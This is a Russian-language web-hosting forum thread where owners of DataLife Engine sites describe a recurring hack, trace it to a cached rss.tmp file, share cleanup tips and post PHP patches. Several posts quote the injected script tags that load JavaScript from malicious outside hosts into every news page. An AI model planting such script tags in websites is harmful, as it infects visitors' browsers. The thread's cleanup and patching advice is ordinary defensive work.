Мы используем cookie-файлы
Для оптимизации работы нашего сайта мы используем cookie-файлы. Продолжая использовать сайт, Вы соглашаетесь с использованием cookie-файлов.
Панель управления
  • Русский
  • Українська
  • UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 170-15-42  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  Vodafone
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Хостинг. Взломали сайт


wolfes666
10 лет
0
Взломали сайт

Ребята помогите кто разбирается, у меня сайт на Data Life Engine сделан и все время кто-то в новостях прописывает в начале и в конце вот такой код, тех поддержка у нас не работает, восстановить mysql тоже (нету в списке новой базы).
Вот тот скрипт что он приписывает:
<script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>
он еще издевается! ...
Вот форум по этой теме (http://talk.prowebber.ru/index.php?showtopic=3990&pid=34123&st=0), я искал вредоносный код по которому он прописывает в новостях эту фигню, но ничего не нашел.
Кто разбирается помогите.

wolfes666
10 лет
0

может попробовать методы описаны тут http://bestwebber.ru/hacks/72-zashhita-dle-sajta-ot-vzloma.html открыть доступ к админ панелям только моему ip, или это не поможет?

alien131
10 лет
0

Обнови Data Life Engine...може профіксили баг.
або поміняй CMS.

wolfes666
10 лет
0

да это и хочу сделать
да) вроде все удачно прошло ) надеюсь в новой бэкдоров нету.

lineage_2008
10 лет
0

тоже самое у меня щас - (выгребаю 2 день - новостей слишком много). а код сидит тут /www/engine/cache/rss.tmp (удалите rss.tmp и код перестанет появляться в новостях Но прийдется это все <script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script> удалять вручную с каждой новости ) файл rss.tmp сам востановится.

sosiska
10 лет
0

Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем http://zheenix.msk.ru на пробел. Теперь скрипт не работает. Оставшиеся хвостики типа "/a043bb882dd6b02d4a8a0074123bfeaa.js" особого вреда, наверное, не представляют.
Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:

Для исправления откройте файл engine/inc/files.php и найдите:
$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );

замените на:
if ($member_id['user_group'] == 1) $serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) ); else $serverfile = '';
if ( $serverfile != '' ) {
$serverfile = str_replace( "\\", "/", $serverfile );
$serverfile = str_replace( "..", "", $serverfile );
$serverfile = str_replace( "/", "", $serverfile );
$serverfile_arr = explode( ".", $serverfile );
$type = totranslit( end( $serverfile_arr ) );
$curr_key = key( $serverfile_arr );
unset( $serverfile_arr[$curr_key] );
if ( in_array( strtolower( $type ), $allowed_files ) )
$serverfile = totranslit( implode( ".", $serverfile_arr ) ) . "." . $type;
else $serverfile = '';
}
if( $serverfile == ".htaccess") die("Hacking attempt!");

Откройте файл engine/classes/thumb.class.php и найдите:
$this->img['des'] = imagecreatetruecolor( $this->img['lebar_thumb'], $this->img['tinggi_thumb'] );

и добавьте выше:
if ($this->img['lebar_thumb'] < 1 ) $this->img['lebar_thumb'] = 1;
if ($this->img['tinggi_thumb'] < 1 ) $this->img['tinggi_thumb'] = 1;


Откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;
ниже добавьте:
$sql_count = "";
Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;
ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );

sosiska
10 лет
0

Забыл написать, что с остальными адресами вредителя нужно поступить также, как с zheenix.msk.ru. То есть http://you-stupped-lox.ucoz.ru тоже заменяем на пробел.

lineage_2008
10 лет
0

Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем <a href="http://zheenix.msk.ru" target="_blank" rel="nofollow">http://zheenix.msk.ru</a> на пробел. Теперь скрипт не работает.

А не проще эти файлы удалить, а не ставить пробелы ( как у меня получилось код обезвредить - читайте выше )
Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:

Для какой версии ДЛЕ эти инструкции ???

sosiska
10 лет
0

Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :) А так данная операция заняла 1,5 минуты.
Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций. Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..
Инструкции в принципе для всех версий DLE. Просто в более новых, например в девятой, эти дыры уже закрыты. В некоторых одни закрыты, другие нет. Тут смотрите сами. А совсем старых вообще нужно выполнить каждый из этих шагов. Данные меры обезопасят сайт в будущем от подобных неприятностей.
Также можно предпринять дополнительные меры предосторожности: http://seo-doc.ru/defence/defence-dle/44-zashhita-dle-ot-vzloma.html

lineage_2008
10 лет
0

Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :)
Наверное Вы меня не поняли
Они были связаны с rss.tmp ( т.е удаляеш это <script src="http://zheenix.msk.ru/5237bfba6fad3b68ac7cb25aa38ed330.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script> на этом месте вылазит это <script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script><script src="http://www.karbrrbrr.co.cc/16d70455cdee14e9500a819485db36af.js" type="text/javascript"></script> и так до 10 разных адресов ( на большее мне терпения не хватило экспереминтировать ) а вот когда вычислил что файл rss.tmp является источником ( взял его и удалил по FTP с сервера ) то все эти адреса перестали появлятся. НО теперь приходиться вручную чистить новости. Кстати у меня версия 9.0 и тоже заплатки на дыры ставил - как видно непомогло.
Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций.
Те что успели новости заразится ( а заражаются они сразу все ) после удаления rss.tmp - БОЛЬШЕ НОВЫЕ АДРЕСА НЕ ПОЯВЛЯЮТСЯ в новостях
Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..
Я еще не тронулся =). Если дорожите своими посетителями - то прийдется чистить новости руками ( я уже лишился 2-3К людей за время которое этот скрипт работал - на данный момент больше половины базы новостей почистил и люди стали опять появлятся )
На этом разрешите откланятся - а то тема становится бесполезным спором (флудом).
Я описал свой способ обезвреживания - который у меня нормально сработал.

wolfes666
10 лет
0

я просто новую версию накатал ) и восстановил mysql ) новости еще не все почистил )

wolfes666
10 лет
0

снова взломали сайт <script src="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js" type="text/javascript"></script>

wolfes666
10 лет
0

только пару дней назад новый сайт установил...

wolfes666
10 лет
0

Володя
а где этот зараженный файл?

lineage_2008
10 лет
0

снова взломали сайт <script src="<a href="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"" target="_blank" rel="nofollow">http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"</a> type="text/javascript"></script>
Тоже самое (только почистил) - поставил 8.3 (была 9.0) посмотрим что утром будет (появятся новые адреса или нет)
вот нашел инфу об этом http://talk.prowebber.ru/index.php?showtopic=3990

Arturjan
10 лет
0

Удали на..й это DLE!!!

alien131
10 лет
0

Видали всі файли... постав з нуля CMS і не став старий шаблон!
P.S.: в мене ніколи просто такого не було

Arturjan
10 лет
0

Слушай если я сейчас начну качать твои конфиги посмотрим что с этого получится.Просто в Joomla качаются пустыми.И ты сам написал что тебя ломали много раз - так зачем это тебе нужно?

Arturjan
10 лет
0

Права поставь на конфиги другие.Все будет работать,я одному пацеку так вопще права не менял и у него все работало.

birdsong
10 лет
0

Когда все почистите, не забудьте сменить все пароли FTP. А также проверьте версию своего антивируса. Возможно скрипт прописывают с Вашего же компа.
Удачи.

lineage_2008
10 лет
0

Вот что еще нашел по этой теме - http://dle.net.ua/bagfixs/5817-ocherednaya-dyrka-na-dle.html

Участвовать в общении на этом форуме могут только зарегистрированные пользователи.